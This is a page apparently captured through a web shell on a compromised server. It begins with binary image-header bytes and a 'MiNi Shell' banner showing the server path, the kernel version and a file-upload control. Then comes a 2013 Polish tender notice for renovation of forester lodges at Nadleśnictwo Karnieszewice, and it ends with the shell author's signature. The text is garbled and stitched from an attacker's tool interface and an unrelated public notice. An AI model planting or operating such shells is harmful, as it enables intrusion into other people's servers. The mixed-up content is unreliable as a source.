JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130801/307406-N-2013.html

<p class="kh_header"><b>Sianów: Roboty budowlane dla 4-ech zadań inwestycyjnych:
Część 1.
Zad. Nr 1. Przebudowa i rozbudowa budynku mieszkalnego - leśniczówki Szczeglino
Zad. Nr 2. Remont modernizacyjny budynku gospodarczego przy leśniczówce Szczeglino
Część 2.
Zad. Nr 3. Przebudowa i remont modernizacyjny budynku gospodarczego przy leśniczówce Kamionka
Część 3.
Zad. Nr 4. Remont modernizacyjny budynków gospodarczych przy leśniczówce Lejkowo
Nr sprawy: SA-2710-07/13</b><br>
<b>Numer ogłoszenia: 307406 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Karnieszewice , Trawica 8A, 76-004 Sianów, tel. 094 3185227, 3185228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.karnieszewice.szczecinek.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jedn. org. nieposiadająca osobowości prawnej zarządzająca mieniem skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane dla 4-ech zadań inwestycyjnych:
Część 1.
Zad. Nr 1. Przebudowa i rozbudowa budynku mieszkalnego - leśniczówki Szczeglino
Zad. Nr 2. Remont modernizacyjny budynku gospodarczego przy leśniczówce Szczeglino
Część 2.
Zad. Nr 3. Przebudowa i remont modernizacyjny budynku gospodarczego przy leśniczówce Kamionka
Część 3.
Zad. Nr 4. Remont modernizacyjny budynków gospodarczych przy leśniczówce Lejkowo
Nr sprawy: SA-2710-07/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla czterech zadań.
Zamówienie zostało podzielone na 3 (trzy) części.

Część 1. 
Zadanie nr 1. Przebudowa i rozbudowa budynku mieszkalnego - leśniczówki Szczeglino - nr inwent. ALP 110/5, dz. nr 521/3, obręb Szczeglino, gmina Sianów
Budynek objęty zamówieniem położony jest na terenie leśniczówki Szczeglino należącej do Nadleśnictwa Karnieszewice. Omawiany obiekt stanowi podpiwniczony budynek mieszkalny o konstrukcji murowanej, pokrytej drewnianym dachem dwuspadowym, mansardowym. Do budynku mieszkalnego przylega wiatrołap stanowiący wejście do części mieszkalnej leśniczówki. Wiatrołap jest pokryty jednospadowym dachem drewnianym pokrytym blachodachówką.
Projektuje się przebudowę i rozbudowę omawianego budynku mieszkalnego polegającą na dobudowie wiatrołapu i węzła sanitarnego dla kancelarii leśnictwa:
- Fundamenty projektowane - ławy i stopy żelbetowe. Beton B25, zbrojenie główne O 12 - 34GS (A-III), strzemiona O 6 St3S (A-I) co 25 cm, otulina 40 mm,
- Ściany fundamentowe projektowane - z bloczków betonowych na zaprawie M5,
- Ściany projektowane - murowane z bloczków gazobetonowych o gr. 24 cm, ocieplone 15 cm warstwą styropianu. Ścianka działowe gr. 12 cm. W związku 
z koniecznością wykonania nadproża nad drzwiami do kancelarii leśniczego w ścianie istniejącej oraz zamurowania otworów okiennych w istniejącym wiatrołapie - projektuje się zamurowania z bloczków gazobetonowych lub cegły. Kolorystykę dobudowy dopasować do budynku mieszkalnego.
- W nowych ścianach projektuje się nadproża systemowe.
- Nad drzwiami wejściowymi do kancelarii leśniczego, w ścianie istniejącej należy wykonać nowe nadproże z 2 dwuteowników 180 o długości 140 cm z przyspawanymi przekładkami stalowymi o wymiarach 500x200x10 co 30 cm.
- Dach wiatrołapu - projektuje się jednospadowy dach drewniany o parametrach 
i geometrii będących kontynuacją dachu istniejącego wiatrołapu. Projektowane murłaty 14x14, krokwie 8x18 cm. Kąt pochylenia dachu ok. 20o. Elementy drewniane dachu należy zakonserwować środkiem do impregnacji drewna.
- Pokrycie dachu wykonać z blachodachówki dopasowanej fakturą i kolorem do istniejącej blachodachówki domu mieszkalnego i wiatrołapu.
- Projektowana stolarka - projektuje się nowe okna PCV w wiatrołapie 
o wielkości i podziale identycznym jak w wiatrołapie istniejącym. Drzwi wejściowe do wiatrołapu wykonać jako aluminiowe, przeszklone - w celu dostatecznego doświetlenia wiatrołapu. Drzwi wewnętrzne do WC płytowe.
- Projektowane posadzki w wiatrołapie - projektuje się wykonanie terakoty. Na schodach zewnętrznych zastosować terakotę przeciwślizgową
- Elewacje: wygląd architektoniczny dobudowy wiatrołapu należy dopasować do istniejącego wiatrołapu.
- Instalacje wodno - kanalizacyjne (rury miedziane, umywalka, WC - kompakt)
- Instalacja centralnego ogrzewania (grzejniki stalowe płytowe i rury z miedzi)
- Instalacja elektryczna - oświetlenie i gniazda 230V

Zadanie nr 2. Remont modernizacyjny budynku gospodarczego przy leśniczówce Szczeglino - nr inwent. ALP 108/52, dz. nr 521/3, obręb Szczeglino, gmina Sianów
Budynek objęty zamówieniem - remontem położony jest na terenie zagrody leśnej - leśniczówki  Szczeglino należącej do Nadleśnictwa Karnieszewice. Omawiany obiekt stanowi niepodpiwniczony budynek gospodarczy o konstrukcji murowanej, pokrytej drewnianym dachem dwuspadowym. Do budynku gospodarczego dobudowana została drewniana wiata na drewno, pokryta dachem jednospadowym. Projektuje się przebudowę części omawianego obiektu jedynie w zakresie wykonania nowego nadproża dla bramy garażowej w jednym pomieszczeniu. Pozostała część obiektu podlega jedynie remontowi.
Powierzchnia zabudowy wraz z wiatą	- 150,5 m2
Powierzchnia  użytkowa 			- 222,3  m2
	Przyziemie			- 86,35 m2
	Wiata na drewno		- 44,76 m2
	Poddasze			- 91,19 m2
Kubatura						- 790,0 m3
Ilość kondygnacji				- 1 ?
Szczegółowy opis robót został zawarty w projekcie budowlanym a zakres i ilości 
w przedmiarze robót. 

Część 2.
Zadanie nr 3. Przebudowa i remont modernizacyjny budynku gospodarczego przy leśniczówce Kamionka - nr inwent. ALP 108/64, dz. nr 44/1, obręb Sucha Koszalińska, gmina Sianów
Budynek objęty zamówieniem - przebudową położony na terenie zagrody leśnej - leśniczówki Kamionka w m. Kołzin należącej do Nadleśnictwa Karnieszewice. Omawiany obiekt stanowi niepodpiwniczony budynek gospodarczy o konstrukcji murowanej, pokrytej drewnianym dachem dwuspadowym. Projektuje się przebudowę 
i remont omawianego obiektu w zakresie wyburzenia starych ścianek działowych 
i wykonania nowych jak również wykonania nowych otworów drzwiowych oraz podciągów. 
Powierzchnia zabudowy (bez zmian)		-110,40 m2
Powierzchnia  użytkowa 			- 178,51 m2
	Przyziemie			-	      89,91 m2
	Poddasze			-	      88,60 m2
Kubatura (bez zmian)				- 718,70 m3
Ilość kondygnacji				- 2
Szczegółowy opis robót został zawarty w projekcie budowlanym a zakres i ilości 
w przedmiarze robót.

Część 3. 
Zadanie nr 4. Remont modernizacyjny budynków gospodarczych przy leśniczówce Lejkowo - nr inwent. ALP 108/47 i 108/70, działka nr 115/2, obręb Lejkowo, gmina Malechowo
Budynek gospodarczy nr 1 (Nr inwent. 108/47) oraz budynek gospodarczy nr 2  (Nr inwent. 108/70) są obiektami wolno stojącymi, jednokondygnacyjnymi. Budynki wykonano w technologii tradycyjnej murowanej, posadowiono bezpośrednio (II kategoria geotechniczna). Do budynków dobudowano wiaty drewniane.
Budynek nr 1 przekryty jest dachem dwuspadowym, natomiast budynek nr 2 przekryto dachem jednospadowym. Budynki posiadają wspólną krawędź przy okapie na odcinku długości około 2.20 m.
Planowane zamierzenie inwestycyjne związane z remontem modernizacyjnym budynków nie zmienia ich danych charakterystycznych (powierzchnia zabudowy, kubatura). Zmianie nie ulega również geometria budynków.
Zakres planowanych robót dot. budynku gospodarczego nr 1:
  Roboty rozbiórkowe (ścianki, podłogi, pokrycie dachowe)
Roboty rozbiórkowe pokrycia dachowego z eternitu należy wykonać zgodnie 
z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania 
i usuwania wyrobów zawierających azbest - Dz. U. z dnia 21 kwietnia 2004 r. (Dz.U. Nr 71 poz. 649).
  Wymiana poszycia drewnianego ścian.
  Naprawa podłóg i posadzek.
  Wymiana bramy garażowej.
  Wymiana pokrycia dachowego z płyt falistych azbestowo-cementowych na blachę
  Wykonanie nowych rynien i rur spustowych z obróbkami blacharskimi.
  Wykonanie utwardzonego wjazdu do garażu.
  Remont wiaty drewnianej.
  Roboty tynkarsko - malarskie wnętrza.
Zakres planowanych robót dot. budynku gospodarczego nr 2:
  Roboty wyburzeniowe (rozkucie ościeży drzwi wewnętrznych, wykucie okien).
  Naprawa podłóg i posadzek.
  Wymiana bramy garażowej.
  Wykonanie izolacji termicznej oraz podsufitki w garażu.
  Wykonanie nowych rynien i rur spustowych z obróbkami blacharskimi.
  Wykonanie utwardzonego wjazdu do garażu.
  Wymiana stolarki okiennej.
  Naprawa drzwi zewnętrznych.
  Roboty tynkarsko - malarskie wnętrza.






Wartość zamówienia nie przekracza kwoty określonej w art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 z późniejszymi zmianami)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6. Zamówienia uzupełniające dotyczą powtórzenia robót objętych zamówieniem podstawowym tego samego rodzaju zamówień o wartości do 50% zamówienia podstawowego (roboty budowlane dla zadań będących przedmiotem niniejszego zamówienia).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.43.00.00-0, 45.44.00.00-0, 45.45.00.00-6, 45.26.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 63.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:
- dla części nr 1 - 3.500,00 złotych
- dla części nr 2 - 2.500,00 złotych
- dla części nr 3 - 2.000,00 złotych.
Składając ofertę na wszystkie części zamówienia, wykonawca zobowiązany jest wnieść wadium w wysokości 8.000,00 złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących posiadania uprawnień do wykonywania określonej działalności. Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia (zadania) polegające na budowie, przebudowie lub remoncie budynków zawierających roboty budowlane, wraz z instalacjami elektrycznymi i wodno-kanalizacyjnymi o wartości każdego zamówienia (zadania) co najmniej 70.000,00 zł netto (słownie: siedemdziesiąt tysięcy 00/100 złotych).
-  Wykonawca w tym zakresie złoży oświadczenie o spełnianiu warunków udziału        w postępowaniu oraz dokumenty wskazane p. XI specyfikacji. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. 
- Wykonawca w tym zakresie złoży oświadczenie o spełnianiu warunków udziału w postępowaniu. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował:
- osobą posiadającą uprawnienia do kierowania robotami budowlanymi            
w specjalności konstrukcyjno-budowlanej,  wpisaną do właściwej izby inżynierskiej   
 i ubezpieczonej od odpowiedzialności cywilnej,

Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu oraz wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją      o podstawie do dysponowania tymi osobami (kierownik budowy / robót)
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli:
- wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia (roboty budowlane), przy czym kwota tego ubezpieczenia nie może być mniejsza niż 250.000,00 złotych
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach:
1. Zamawiający przewiduje możliwość zmiany ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2. Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia:
a) przypadku udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego w oparciu o art. 67 ust. 1 ustawy PZP, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
b) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia
c) jeżeli w czasie obowiązywania umowy wystąpią wybitnie niesprzyjające warunki pogodowe uniemożliwiające realizację zadania np.: długotrwałe opady atmosferyczne, 
d) przypadku zaistnienia okoliczności niezależnych od Wykonawcy a w szczególności w przypadku istotnych błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych itp.
3. W przypadku powyższych okoliczności może nastąpić zmiana terminu zakończenia robót lub wynagrodzenia należnego Wykonawcy. 
4. Nowy termin wykonania zamówienia ustali Zamawiający po negocjacjach     z Wykonawcą.
5. Zamawiający w razie wstrzymania robót z przyczyn, za które wykonawca nie odpowiada, obowiązany jest do:
a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały wykonane do dnia odstąpienia,
b) przejęcie od Wykonawcy terenu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.karnieszewice.szczecinek.lasy.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Karnieszewice
Trawica 8a, 76-004 Sianów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 10:00, miejsce: Nadleśnictwo Karnieszewice
Trawica 8a, 76-004 Sianów, zachodniopomorskie
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com